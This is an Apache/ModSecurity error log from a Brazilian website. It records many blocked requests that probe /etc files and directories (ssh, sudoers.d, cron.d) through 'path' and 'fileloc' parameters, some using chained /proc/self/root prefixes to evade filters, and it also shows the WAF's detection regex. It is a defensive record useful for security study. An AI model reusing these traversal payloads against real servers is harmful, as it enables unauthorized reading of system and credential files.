[Thu Mar 19 11:47:39.164277 2026] [:error] [pid 14269:tid 140411574073088] [client 57.141.18.35:39600] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMiwbLMZ6AikZjR9VkEwAAABQ"]
[Thu Mar 19 11:47:45.351074 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:54144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMkf-YZRR_7pZ7nDKSagAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:47:46.923682 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.37:39750] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMkta6ubjKNq_cu4ZcBwAAA1g"]
[Thu Mar 19 11:47:49.508730 2026] [mime_magic:error] [pid 17887:tid 140411616036608] (70014)End of file found: [client 57.141.18.124:39506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:47:53.154016 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.67:39886] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMmf-YZRR_7pZ7nDKSbgAAA8M"]
[Thu Mar 19 11:47:53.554747 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.120:39552] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMmf-YZRR_7pZ7nDKSbwAAA8A"]
[Thu Mar 19 11:47:54.398923 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.33:39914] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMmgkwaGbbGflqUZDKVgAAAMw"]
[Thu Mar 19 11:47:54.520290 2026] [:error] [pid 27403:tid 140411557287680] [client 57.141.18.88:39922] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMmhkFeYa1D6dYQnD3hgAAAdY"]
[Thu Mar 19 11:47:57.084415 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.75:39982] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMnfu8EFLIOrSqIpuuMwAAAk8"]
[Thu Mar 19 11:47:57.391624 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.15:39332] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMnda6ubjKNq_cu4ZcCgAAA00"]
[Thu Mar 19 11:47:58.040054 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.95:40000] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMnsdf6f5d65gmYZR-mwAAAsw"]
[Thu Mar 19 11:48:02.565890 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:59554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMogbLMZ6AikZjR9VkIAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:48:06.120962 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:48:12.299728 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.11:39654] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMrAkwaGbbGflqUZDKZgAAAMg"]
[Thu Mar 19 11:48:12.712282 2026] [:error] [pid 17653:tid 140411708356352] [client 57.141.18.47:40390] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMrMdf6f5d65gmYZR-pAAAAsQ"]
[Thu Mar 19 11:48:16.413513 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:34830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMsOyqAr6etmhZHNpnLwAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:48:23.491494 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:55966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMt1_V7PWP6ixUYl7DpgAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:48:32.054882 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38768] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:48:35.473122 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:42848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMwgbLMZ6AikZjR9VkOQAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:48:47.200115 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.241.31:48080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMz1_V7PWP6ixUYl7DrwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:48:59.189208 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:59250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwM2_-YZRR_7pZ7nDKSjgAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:00.145779 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:49:21.066176 2026] [proxy_fcgi:error] [pid 19093:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:49:29.507098 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:42006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwM-QkwaGbbGflqUZDKxQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:37.618083 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.241.31:47988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNAV_V7PWP6ixUYl7DxgAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:44.125791 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:49:45.802623 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.241.31:47994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNCRkFeYa1D6dYQnD30wAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:50.540311 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:45072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNDta6ubjKNq_cu4ZcegAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:52.470676 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:48228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNEMdf6f5d65gmYZR-3gAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:52.667771 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:48228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNEMdf6f5d65gmYZR-3wAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:49:57.519294 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:36900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNFQkwaGbbGflqUZDK2gAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
